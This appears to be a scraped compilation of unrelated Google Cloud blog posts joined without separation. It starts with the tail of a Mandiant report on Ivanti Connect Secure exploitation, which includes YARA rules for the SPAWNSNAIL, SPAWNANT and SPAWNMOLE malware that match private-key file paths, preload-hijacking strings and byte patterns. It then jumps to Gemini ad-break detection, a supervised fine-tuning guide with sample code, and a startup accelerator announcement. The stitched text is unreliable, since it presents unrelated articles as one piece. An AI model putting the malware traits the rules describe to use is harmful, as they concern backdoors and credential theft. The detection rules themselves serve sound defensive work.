Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and deploying web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely that additional threat actors will attempt to target Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool ("ICT") and contacting Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, a successful scan and a scan on a compromised device can be distinguished in part by the number of steps reported in the ICT output.
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if the actor has returned the appliance to a clean state. The ICT does not scan for malware or other indicators of compromise. Ivanti recommends that customers run the ICT in conjunction with other security monitoring tools that can detect post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
Online video consumption has skyrocketed. A staggering 1.8 billion people globally subscribed to streaming services in 2023, and 92% of internet users worldwide watched online videos every month in 2024. This growth creates a significant opportunity for advertisers who want to reach their customers with great creative, but ineffective ad placement can disrupt their customers' viewing experiences.
An important way to deliver a better ad experience is seamless ad integration, which means placing ads at natural breaks in video content to avoid interrupting the narrative flow. Scene change detection technology identifies these natural breaks by analyzing a video’s visual, audio, and textual elements. Google’s AI models such as Gemini offer a win-win for viewers and advertisers:
Increased viewer engagement: Seamless ad integration minimizes disruption and enhances the viewing experience.
Higher ad revenue: More relevant ads lead to better click-through rates and increased advertiser ROI.
Simplified workflows: Google Cloud’s Vertex AI platform streamlines the entire video monetization process, from scene detection to ad placement.
To help you maximize the potential of your ad inventory, we’ll share how Google Cloud’s generative AI revolutionizes scene detection, leading to more effective ad placement, improved reach, higher viewer engagement, and ultimately, increased revenue for publishers.
The challenges of traditional ad break detection
Traditional ad break detection methods, designed primarily for structured television content with fade-outs and fixed commercial breaks, often struggle to identify ideal ad placement points in today’s diverse video landscape. These methods—including shot boundary detection, motion analysis, audio analysis, and rule-based systems—can miss subtle transitions, misinterpret rapid movement, operate independently of visual context, lack flexibility, and rely on manual tagging. This is where Google’s Gemini models can help.
Intelligent scene detection with Google’s Gemini models
Gemini’s multimodal capabilities can analyze video, audio, and text simultaneously, enabling a level of nuanced scene understanding that was previously impossible. Now, we can ask Gemini to understand the nuances of video content and generate very granular contextual metadata, unlocking capabilities that were previously impossible to achieve efficiently.
Here are some examples of how Gemini identifies ad breaks and provides detailed contextual metadata:
| Ad Break Example | Transition Feeling | Transition Type | Narrative Type | Prior Scene Summary |
| --- | --- | --- | --- | --- |
| Daytime to Evening Dinner | Cheerful, relaxed | Outdoor to indoor | Scene transition from plot to end | A group of friends enjoying dinner at a restaurant. |
| End of Tense Dialogue Scene | Tense, dramatic | Fade-out | Scene of rising conflict | Two characters arguing over a specific issue. |
| Busy Street to Quiet Cafe | Neutral | Hard cut, outdoor to indoor | Scene transition | A character walking along a busy street. |
This enriched metadata allows for the precise matching of the right ad to the right user at the right time. For example, the first ad break (Daytime to Evening Dinner), with its associated sentiment of “cheerful and relaxed,” might be ideal for advertisements that resonate with those feelings such as travel, entertainment or leisure products, rather than just a product like cookware. By understanding not just the basic context, but also the emotional tone of a scene, Gemini facilitates a new level of contextual advertising that is far more engaging for the viewer.
Proof point: The Google Cloud architecture
Google Cloud, powered by the Gemini 1.5 Pro model, delivers a robust and scalable solution for intelligent ad break detection. Its multimodal analysis capabilities simultaneously process video, audio, and text to detect even subtle transitions, enabling seamless ad integration. Gemini's ability to process up to 2 million tokens ensures comprehensive analysis of long videos across diverse genres with minimal retraining, offering versatility for media providers. This large context window allows the model to analyze approximately 2 hours of video and audio content in a single pass, which significantly reduces processing time and complexity compared to methods that require breaking videos into smaller chunks.
The architecture ensures high performance and reliability through these key stages:
1. Video Ingestion and Storage (GCS): Videos are ingested and stored in Google Cloud Storage (GCS), a highly scalable and durable object storage service offering various storage classes to optimize cost and performance. GCS ensures high availability and accessibility for processing. Robust security measures, including Identity and Access Management (IAM) roles and fine-grained access controls, are in place.
2. Orchestration and simultaneous processing (Vertex AI pipelines & Gemini): Vertex AI pipelines orchestrate the end-to-end video analysis process, ensuring seamless execution of each stage. Vertex AI manages simultaneous processing of multiple videos using Google Gemini’s multimodal analysis, significantly accelerating the workflow while maintaining scalability. This includes built-in safety filters powered by Gemini, which perform a nuanced contextual analysis of video, audio, and text to discern potentially inappropriate content. The results are returned in JSON format, detailing scene change timestamps, video metadata, and contextual insights.
Post-processing is then applied to the JSON output to structure the data in a tabular format, ensuring compatibility with downstream storage and analysis tools. This includes:
Standardizing timestamps: Ensuring uniform time formats for consistent querying and integration.
Metadata mapping: Beyond basic metadata extraction, this stage includes the classification of scenes (or entire video programs) into industry standard taxonomies, such as the IAB’s, or the customer’s own custom taxonomies. This allows for more granular organization of video content based on their type and provides an easier method of ad targeting.
Error handling and data validation: Filtering out incomplete or invalid entries to maintain data quality.
3. Structured data storage and enrichment (BigQuery): The structured data resulting from Gemini’s scene change detection analysis, including timestamps, metadata, and contextual insights, is stored in BigQuery. BigQuery ML can leverage this integrated data to build predictive models for ad placement optimization. For example, you can schedule a 15-second action-themed ad during a scene change in an action sequence, targeting viewers who frequently watch action movies in the evening.
4. Monitoring and logging (GCP operations suite): GCP Operations Suite provides comprehensive monitoring and alerting for the entire pipeline, including real-time visibility into job progress and system health. This includes detailed logging, automated alerts for failures, and dashboards for key performance indicators. This proactive approach ensures timely issue resolution and maximizes system reliability.
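To make this concrete, here is a minimal sketch of the core analysis step using the Vertex AI SDK for Python. The project, bucket path, prompt wording, and output fields are illustrative assumptions rather than the exact pipeline configuration described above.

# Minimal sketch: ask Gemini on Vertex AI to propose ad-break points for a video in GCS.
# The bucket path, prompt, and JSON fields below are illustrative assumptions.
import json
import vertexai
from vertexai.generative_models import GenerativeModel, Part

vertexai.init(project="my-project", location="us-central1")  # hypothetical project

model = GenerativeModel("gemini-1.5-pro-002")

video = Part.from_uri("gs://my-bucket/episodes/episode_01.mp4", mime_type="video/mp4")
prompt = (
    "Identify natural ad break points in this video. For each break, return JSON with "
    "fields: timestamp (MM:SS), transition_feeling, transition_type, narrative_type, "
    "and prior_scene_summary. Respond with a JSON array only."
)

response = model.generate_content(
    [video, prompt],
    generation_config={"response_mime_type": "application/json"},
)

ad_breaks = json.loads(response.text)
for b in ad_breaks:
    print(b["timestamp"], b.get("transition_feeling"))

From here, the parsed JSON can flow into the post-processing and BigQuery stages described in the steps above.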
Foundation models such as Gemini have revolutionized how we work, but sometimes they need guidance to excel at specific business tasks. Perhaps their answers are too long, or their summaries miss the mark. That’s where supervised fine-tuning (SFT) comes in. When done right, it unlocks incredible precision to tailor Gemini for specialized tasks, domains, and stylistic nuances.
In an earlier blog, we covered when to embrace SFT and how it compares to other methods for optimizing your model’s output. In this blog, we’ll go deeper into how developers can streamline their SFT process, including:
Selecting the optimal model version
Crafting a high quality dataset
Best practices to evaluate the models, including tools to diagnose and overcome problems.
1. Establish a baseline and select your model
First, evaluate your foundation model on a representative dataset before fine-tuning to quantify improvements. This helps you understand its initial capabilities and identify areas for targeted improvement. Here are three key things to analyze:
Initial performance: Assess how the model performs without any training (zero-shot) and potentially with a few examples (few-shot).
Metrics: Select evaluation metrics aligned with your specific task, like exact match, BLEU or ROUGE.
Data: Ensure your evaluation dataset is diverse and representative of the real-world data the model will encounter.
Analyzing these baseline results, especially where the model struggles, is crucial for defining an effective fine-tuning strategy. When fine-tuning Gemini, you have a couple models to choose from:
Gemini 1.5 Pro: Google's best model for general performance.
Gemini 1.5 Flash: Google's model designed for cost-performance and low latency.
Choosing the right model involves two key considerations:
Align the model with your use case: Before using SFT, start with the model that most easily achieves your desired functionality. If your application requires high accuracy and complex reasoning, begin with Gemini Pro. If this works, you can then begin to look at cost; for example, you could try SFT on Flash to get better latency and cheaper inference.
Efficiently improving the model with your data: Before fine-tuning a larger model like Gemini Pro, it's often beneficial to test your tuning data on a smaller, less expensive model like Gemini Flash first. This allows you to verify that your data is actually improving the model's performance. If the performance is not good enough, you can always switch to a larger model. If your tuning data effectively improves the smaller model's accuracy, it indicates that your data is of good quality, and there is a good chance that tuning the larger model with this data will be effective, too.
Consider your data
SFT isn’t just about throwing labeled data at a model; it’s a nuanced process where the right choices are crucial. To adapt a foundation model for specific tasks, we fine-tune it with a labeled dataset. This dataset contains inputs (like an earnings report) and their desired outputs (like a summary).
Machine learning thrives on data. The success of your supervised fine-tuning depends significantly on the quality of your tuning data. Here are some essential guidelines to follow.
Quality vs quantity
Quality vs. quantity in your training data is crucial. Vertex AI leverages Low-Rank Adaptation (LoRA) for efficient fine-tuning, freezing the original model weights and injecting trainable matrices to adjust model behavior effectively with a small number of trainable parameters. This means faster fine-tuning, fewer resources, and less reliance on massive datasets.
Focus on high-quality examples that are:
Relevant: Closely aligned with your specific fine-tuning task.
Diverse: Covering a wide range of potential inputs and scenarios.
Accurate: Featuring correct labels and outputs.
While more data can improve a model, it often needs fewer training epochs, and at some point you will hit diminishing returns; it's not worth tuning on the same cluster of similar examples over and over again. A smaller, refined, and representative dataset often outperforms a large, noisy one. Small datasets carry a risk of overfitting, so you may want to control your number of epochs. You can start with around 100 examples to validate the effectiveness of tuning, then scale up to cover more corner cases or categories.
Data pre-processing
Pre-processing is a critical step in preparing data for supervised fine-tuning of large language models (LLMs). Research has shown that one of the most crucial pre-processing steps is deduplication, which involves identifying and removing duplicate data points. Duplicate examples in training data can lead to several issues: memorization, which hinders generalization, and inefficient training, as the model redundantly learns from similar clusters. Duplicate or near-duplicate examples between training and validation/test sets cause data leakage, artificially inflating performance.
For deduplication, leverage techniques like exact and fuzzy matching, and clustering. Tools like ExactSubstr deduplication can efficiently handle larger datasets. Furthermore, explore data augmentation to enhance data diversity and model robustness.
Be aware that pre-processing can also help with evaluating the performance of your fine-tuned model. For example, you might want to normalize letter casing, remove extra whitespace, and standardize punctuation.
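As a lightweight illustration of the deduplication and normalization ideas above, the following sketch removes exact duplicates after basic text normalization. The field names ("input", "output") and file paths are assumptions, not a required schema.

# Minimal sketch: exact-match deduplication of a JSONL tuning dataset after light normalization.
# The field names and file paths are assumptions for illustration.
import hashlib
import json

def normalize(text: str) -> str:
    # Lowercase and collapse whitespace so trivially different copies hash identically.
    return " ".join(text.lower().split())

seen, kept, total = set(), [], 0
with open("train_raw.jsonl") as f:
    for line in f:
        total += 1
        example = json.loads(line)
        key = hashlib.sha256(
            (normalize(example["input"]) + "\x1f" + normalize(example["output"])).encode()
        ).hexdigest()
        if key not in seen:  # keep only the first occurrence of each normalized pair
            seen.add(key)
            kept.append(example)

with open("train_dedup.jsonl", "w") as f:
    for example in kept:
        f.write(json.dumps(example) + "\n")

print(f"kept {len(kept)} of {total} examples")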
2. Add instructions to your dataset
Including instructions in your fine-tuning dataset helps boost performance. The model learns to condition its output on the given instructions, improving its ability to perform the desired task and generalize to similar, unseen instructions, and reducing the need for lengthy and complex prompts during inference. There are two primary methods: system instructions and text prompts; both are optional but can improve performance.
System instructions provide global directives, shaping the overall response style. For example, "Answer in JSON format" enforces structured outputs, while "You are an expert in bioinformatics" sets the response domain.
Instance-level instructions offer example-specific guidance embedded within the model input. For instance, "Summarize the following research paper, focusing on the methodology and key findings:" directs the model to extract specific information.
Experimenting with different instruction styles, informed by resources like the Gemini prompting strategies, is important. You can experiment by prompting the Gemini model before adding the instruction to the dataset. Adding few-shot examples to your dataset will not give additional benefit. Crucially, ensure the prompts and instructions used in your fine-tuning dataset closely resemble those you plan to use in production. This alignment is vital for optimal performance.
Training-serving skew
A critical factor influencing fine-tuning effectiveness is the alignment between your tuning data and production data. Divergence in aspects like format, context, or example distribution can significantly degrade model performance. For instance, if your tuning data consists of formal language examples and your production data includes informal social media text, the model may struggle with sentiment analysis. To prevent this, carefully analyze your training and production data. Techniques like data augmentation and domain adaptation can further bridge the gap and enhance the model’s generalization capabilities in production.
Focus on complex examples
When fine-tuning, it’s tempting to throw all your data at the model and hope for the best. However, a more strategic approach focuses on examples that the base model finds difficult.
Instead, identify the specific areas where the model struggles. By curating a dataset of these challenging examples, you can achieve more significant improvements with less data. This targeted approach not only boosts performance but also makes your fine-tuning process more efficient. During the benchmarking process, analyze the model's performance on a diverse dataset and identify examples where the model struggles with specific tasks, formats, or reasoning abilities. Then add these examples to your training dataset; you might also want to find extra examples to add to your evaluation dataset to prevent leakage.
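One simple way to surface such challenging examples is to run the base model over a labeled pool and keep the items it gets wrong. The sketch below uses a strict exact-match check as a crude filter; the model name, field names, and matching criterion are assumptions you would adapt to your task.

# Minimal sketch: collect examples the base model answers incorrectly (by exact match)
# so they can be added to the tuning set. Model name and fields are assumptions.
import json
import vertexai
from vertexai.generative_models import GenerativeModel

vertexai.init(project="my-project", location="us-central1")
model = GenerativeModel("gemini-1.5-flash-002")

hard_examples = []
with open("labeled_pool.jsonl") as f:
    for line in f:
        ex = json.loads(line)
        prediction = model.generate_content(ex["input"]).text.strip()
        if prediction.lower() != ex["output"].strip().lower():  # exact match as a crude filter
            hard_examples.append(ex)

with open("hard_examples.jsonl", "w") as out:
    for ex in hard_examples:
        out.write(json.dumps(ex) + "\n")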
The importance of a validation dataset
Always incorporate a well-structured validation dataset into your fine-tuning process. This separate set of labeled data serves as an independent benchmark to evaluate your model’s performance during training, helping you to identify overfitting and choose the epochs to stop training at, and ensuring the model generalizes well to unseen data. The validation dataset should be representative of the real-world data that will be used during inference.
Data formatting
In supervised fine-tuning, the model learns from a labeled dataset of input-output pairs. To use SFT for Gemini, your data needs to be in a specific format in a JSONL file. Adding instructions to your dataset helps guide the model during the fine-tuning process. You can add a systemInstruction and additional instructions to the contents fields, each containing role and parts to represent the conversation flow and content. You do this for each of the lines (samples) in your JSONL file. For instance, a systemInstruction might specify the persona of the LLM, while the contents would include the user query and the desired model response. A well-structured dataset in the correct format is crucial for effective knowledge transfer and performance improvement during fine-tuning. Here's an example (datapoint) of the required format for your dataset:
{
  "systemInstruction": {
    "role": "system",
    "parts": [ { "text": "You are a helpful and harmless AI assistant." } ]
  },
  "contents": [
    { "role": "user", "parts": [ { "text": "What is the capital of France?" } ] },
    { "role": "model", "parts": [ { "text": "The capital of France is Paris." } ] }
  ]
}
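If you generate this file programmatically, a short script like the following writes records in the same structure. The persona text and the example pair are purely illustrative.

# Minimal sketch: write (input, output) pairs as JSONL records in the structure shown above.
# The persona text and the example pair are illustrative assumptions.
import json

system_text = "You are a helpful and harmless AI assistant."
pairs = [("What is the capital of France?", "The capital of France is Paris.")]

with open("train.jsonl", "w") as f:
    for user_text, model_text in pairs:
        record = {
            "systemInstruction": {"role": "system", "parts": [{"text": system_text}]},
            "contents": [
                {"role": "user", "parts": [{"text": user_text}]},
                {"role": "model", "parts": [{"text": model_text}]},
            ],
        }
        f.write(json.dumps(record) + "\n")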
3. Hyperparameters and performance
When you start with fine-tuning it’s important to choose the right hyperparameters. Hyperparameters are the external configuration settings that govern the training process of a large language model which ultimately determine the model’s performance on a given task. When fine-tuning Gemini you can follow the guidance below to set the hyperparameters (epochs, learning rate multiplier and adapter size):
Gemini 1.5 Pro
Text fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = 20, learning rate multiplier = 10, adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = 10, learning rate multiplier = default or 5, adapter size = 4.
Image fine-tuning: with a dataset size of ~1000 examples, start with epochs = 15, learning rate multiplier = 5, and adapter size = 4. Increase the number of epochs when you have <1000 samples and decrease when you have >1000 examples.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Gemini 1.5 Flash
Text fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = default, learning rate multiplier = 10, and adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = default, learning rate multiplier = default, and adapter size = 8.
Image fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs >= 15 (increase when you have fewer examples), learning rate multiplier = 5, and adapter size = 16. With a dataset size of >= 1000 examples or average context length >= 500, we recommend setting epochs <= 15 (decrease when you have more examples), learning rate multiplier = default, and adapter size = 4.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Audio use cases like automated speech recognition (ASR) might need a higher epochs setting to reach optimal results. Start with the settings mentioned above and, based on your evaluation metrics, increase the number of epochs as needed.
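As a starting point, these recommendations can be passed directly when launching a tuning job. The sketch below uses the supervised tuning interface in the Vertex AI SDK for Python; the dataset URIs and the specific values shown are assumptions to adjust based on the guidance above.

# Minimal sketch: launch a supervised tuning job on Vertex AI with explicit hyperparameters.
# Dataset URIs and the chosen values are assumptions; adjust them per the guidance above.
import time
import vertexai
from vertexai.tuning import sft

vertexai.init(project="my-project", location="us-central1")

job = sft.train(
    source_model="gemini-1.5-flash-002",
    train_dataset="gs://my-bucket/sft/train.jsonl",
    validation_dataset="gs://my-bucket/sft/validation.jsonl",
    epochs=10,
    learning_rate_multiplier=1.0,
    adapter_size=4,
    tuned_model_display_name="my-sft-experiment",
)

# Poll until the tuning job finishes, then print the tuned model endpoint.
while not job.has_ended:
    time.sleep(60)
    job.refresh()

print(job.tuned_model_endpoint_name)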
After your initial run, iterate by adjusting the hyperparameters and closely monitoring key training and evaluation metrics. Two primary metrics to monitor during fine-tuning are:
Total loss measures the difference between predicted and actual values. A decreasing training loss indicates the model is learning. Critically, observe the validation loss as well. A significantly higher validation loss than training loss suggests overfitting.
Fraction of correct next step predictions measures the model’s accuracy in predicting the next item in a sequence. This metric should increase over time, reflecting the model’s growing accuracy in sequential prediction.
Monitor these metrics for both your training and validation datasets to ensure optimal performance; depending on the task, consider other relevant metrics as well. To monitor your fine-tuning job, use the Google Cloud console or TensorBoard. In an ideal scenario, training and validation loss both decrease steadily and converge, while the fraction of correct next step predictions rises over time.
Remember: These are just starting points. Experimentation is key to finding the optimal hyperparameters for your specific fine-tuning task. You might also want to follow some of the guidance below based on the performance of your fine-tuning experiment.
Suboptimal performance
How to spot this: Training loss and validation loss decrease as training progresses, but the validation loss does not converge or reach a minimum.
Possible causes: The training dataset may be too small or lack sufficient diversity to represent the real-world scenarios the model will encounter.
How to alleviate: Increase the number of epochs or the learning rate multiplier to speed up the training. If that doesn't work, you can gather more data.
Overfitting
How to spot this: During training, the training loss decreases consistently, but the validation loss decreases initially and then starts to increase. This divergence indicates that the model is learning the training data too well and is failing to generalize to new data.
Cause: The model has too much capacity (e.g., too many layers or parameters) relative to the size and complexity of the training data.
How to alleviate: Decrease the number of epochs to the point where validation loss reaches its minimum, or increase the effective size and diversity of the training data.
Potential data issues
How to spot this: A very high initial training loss (>10) indicates that the model's predictions are very far from the labels.
Cause: There could be issues with your training dataset. One typical example is that the input length exceeds the maximum context length, which leads to truncation.
How to alleviate: Double-check your training dataset to make sure it follows the best practices from the previous section.
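To catch the truncation issue described above before tuning, you can count tokens for each example. The sketch below uses the SDK's count_tokens call; the token budget is an assumption you should set based on the model you are tuning and your expected output length.

# Minimal sketch: flag training examples whose input may exceed the model's context window.
# MAX_INPUT_TOKENS is an assumption, not an official limit; set it for your model and output budget.
import json
import vertexai
from vertexai.generative_models import GenerativeModel

vertexai.init(project="my-project", location="us-central1")
model = GenerativeModel("gemini-1.5-flash-002")

MAX_INPUT_TOKENS = 32_000  # illustrative budget

with open("train.jsonl") as f:
    for i, line in enumerate(f):
        ex = json.loads(line)
        text = " ".join(
            part["text"]
            for turn in ex["contents"]
            for part in turn["parts"]
            if "text" in part
        )
        count = model.count_tokens(text).total_tokens
        if count > MAX_INPUT_TOKENS:
            print(f"example {i} has {count} tokens and may be truncated")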
Evaluate your model
Evaluating fine-tuned language models is crucial for understanding their performance, selecting checkpoints, and optimizing hyperparameters. Evaluation can be challenging for generative models, as their outputs are often open-ended and creative. To gain a holistic understanding of performance, it's best to combine different evaluation approaches, primarily utilizing a blend of auto-metrics and model-based evaluation, potentially calibrated with human evaluation.
Auto-metrics: These metrics provide quantitative measures by comparing the model’s output to a ground truth. While they may not capture nuanced aspects like factuality, they remain valuable due to their:
Speed: Auto-metrics are computationally inexpensive and fast to calculate.
Objectivity: They offer consistent, objective measurements, enabling reliable progress tracking and model comparisons.
Interpretability: Metrics like accuracy, F1 score, or BLEU are widely understood and provide readily interpretable results.
It’s crucial to select appropriate auto-metrics based on the task. For instance:
BLEU Score (translation and summarization): Measures n-gram overlap between generated and reference text, focusing on precision.
ROUGE (summarization): Evaluates n-gram overlap with an emphasis on recall.
Model-based metrics: These methods leverage a language model as a judge (autorater) to assess the quality of generated output based on predefined criteria, aligning more closely with the task evaluation rubrics. For example, you might use model-based evaluation to assess the factual accuracy or logical consistency of a response.
Human Evaluation: While human judgment remains the gold standard, its cost and scalability limitations make it less practical for continuous evaluation during fine-tuning. Instead, we can strategically use human evaluation to calibrate model-based evaluators (autoraters). This involves collecting a smaller but high-quality dataset of human judgments and training the autorater to mimic these judgments. We can then rely on the autorater during the tuning process and conduct a final round of validation with human raters to ensure the chosen checkpoint meets the desired quality standards.
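The auto-metrics discussed above take only a few lines of code to compute. The sketch below reports exact match and ROUGE-L over a predictions file using the open-source rouge-score package; the file layout and field names are assumptions.

# Minimal sketch: exact match and ROUGE-L over model outputs vs. references.
# Requires `pip install rouge-score`; the JSONL fields are assumptions.
import json
from rouge_score import rouge_scorer

scorer = rouge_scorer.RougeScorer(["rougeL"], use_stemmer=True)
exact, rouge_l, n = 0, 0.0, 0

with open("predictions.jsonl") as f:
    for line in f:
        ex = json.loads(line)
        pred, ref = ex["prediction"].strip(), ex["reference"].strip()
        exact += int(pred.lower() == ref.lower())
        rouge_l += scorer.score(ref, pred)["rougeL"].fmeasure
        n += 1

print(f"exact match: {exact / n:.3f}")
print(f"ROUGE-L F1:  {rouge_l / n:.3f}")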
What’s next?
Ready to get started? Dive into our Generative AI repository and explore notebooks like our guide on how to use supervised fine-tuning. Experience the transformative potential of SFT on Vertex AI, and tailor your AI applications for peak performance and customization.
Want to fine-tune a Gemini model? Head over to the Vertex AI documentation to see which ones you can customize.
If you want to learn more about Generative AI and fine-tuning please have a look at our 5-Day Gen AI Intensive Course.
A special thanks to May Hu, Yanhan Hou, Xi Xiong, Sahar Harati, Emily Xue and Mikhail Chrestkha from Google Cloud for their contributions.
At Google Cloud, we focus on building the most competitive and powerful network of support for startups. One of the ways we show our support is by partnering with investors, accelerators, and incubators to deliver the resources and benefits that help startups succeed.
For example, we are proud to partner with marquee institutions who invest in the next generation of founders like Y Combinator. We have also extended our network of partnerships to accelerators worldwide who support founders with mentorship, education, and in some cases, investment, such as ERA and AI2 Incubator.
In 2024, we worked with over 300 accelerators worldwide to help thousands of startups and over 3,000 founders build with Google. We’ve extended benefits to these startups including access to Startup Success Managers, Customer Engineers, and AI product teams, dedicated packages of credits, and technical programming like workshops and office hours.
Today, we’re proud to announce our latest partnerships with three more accelerators – Berkeley SkyDeck, Upekkha, and UnternehmerTUM – and highlight some of the companies we’re supporting through them.
Introducing our latest accelerator partnerships
Berkeley SkyDeck is the only university accelerator partnering with a leading venture capital fund. Berkeley's mission emphasizes long-term societal benefit, and prioritizes companies that align with this vision. Several SkyDeck companies are already running on Google Cloud, including:
Deeli AI, an AI-powered platform that helps companies discover and evaluate emerging technologies to make informed investment decisions. They currently build their product and data pipeline on various services such as GCE, Cloud Run, and Dataflow, and interact with models from the Vertex AI Model Garden.
ContextQA is agentic AI for software testing, providing 12x the value by enabling accurate, user-centric test automation from day zero of development and helping to deliver bug-free products 40% faster. ContextQA uses Gemini models to continuously compare actual application behavior with expected behavior, adapting automatically to new changes for immediate agility.
T-Robotics provides pre-trained AI skills for robots that make commercial robots intelligent and robust. These skills are programmed through a conversational robot agent that leverages visual, haptic, action and language models – including Google Cloud’s Gemini – to seamlessly interpret and adapt to diverse industrial environments.
“Our partnership with Google Cloud enables startups to build better and faster, which is crucial for their success. Beyond the technology and services provided, we foster meaningful connections between our startups and Googlers, facilitating discussions on industry trends and innovations in AI.” – Taylor Marcus, Head of Business Development at Berkeley Skydeck
Upekkha helps Indian founders build vertical AI companies that sell globally, with intense coaching, a network of founders, and capital. Google Cloud is partnering with them to support:
Outpost is a platform for AI/ML and data teams to train, fine tune, and deploy genAI models with managed infrastructure, tools, and workflows.
Labellerr's data labeling engine uses automated annotation and smart QA, processing millions of images and thousands of hours of video in just a few weeks using Google Vertex AI integration and Cloud Run, work that previously took months for ML teams.
Bynry’s SMART360 leverages Google Cloud’s robust infrastructure to empower small and mid-sized utilities to enhance operational efficiency and customer satisfaction.
“Google Cloud has technology that just works. You can tell they actually listen to developers. They don’t just give out credits; they help founders understand how to use their technology.” – Thiyagarajan Maruthavanan (Rajan) – Managing Partner, Upekkha
UnternehmerTUM is the leading center for innovation and business creation in Europe, with more than 50 high-growth technology start-ups every year, and offers complete service from initial idea to IPO. Startups supported by them include:
Kraftblock’s innovative technology offers unparalleled large-scale, long-duration energy storage, empowering industries to transition towards sustainable thermal processes. The green tech company is using Google’s Compute Engine to power their simulations.
tulanā's highly customizable platform uses forecasting, optimization, simulation, and AI to help enterprise clients make better decisions across their supply chains. tulanā is using Google Cloud Run to horizontally scale its optimization workloads, Google's Gemini model for intelligent ETL processes, and Cloud SQL and BigQuery to store customer data.
SE3 Labs specializes in 3D computer vision and AI. They develop advanced technologies to create "Spatial GPTs," which are essentially AI models that can understand and interact with the world in 3D. The startup loves using Google Cloud Run for their deployment.
“We chose to partner with Google Cloud because their innovation-driven approach aligns closely with our mission to empower high-tech startups. Google Cloud’s advanced infrastructure, AI, and data analytics capabilities offer exceptional tools that support our founders in building robust, scalable solutions, from market entry to growth.”– Barbara Mehner, Managing Partner at XPRENEURS by UnternehmerTUM
Building on a history of support with accelerators
These new partnerships expand on our existing work with accelerators to help bring leading cloud, AI models, and AI-optimized infrastructure to the companies they support. These include:
500 Global is a multi-stage venture capital firm. Its investments and flagship accelerator help founders with access to a supportive global network of those who’ve successfully built startups before. Notable alumni include Intercom, Talkdesk, Innovaccer, Babylist and Solana.
Techstars provides individualized care with its small cohort size and mentor-driven approach across more than 30 cities worldwide.
Antler is a global early-stage VC that operates in 30 cities across major entrepreneurial hubs, with a proven process to back founders from pre-seed to Series C. Their flagship Residency Program empowers founders to find the right co-founders, validate and build ideas rapidly, and secure funding to launch and scale impactful ventures.
StartX is the non-profit startup community, accelerator, and fellowship program for over 2,500 Stanford University founders, offering support without requiring equity.
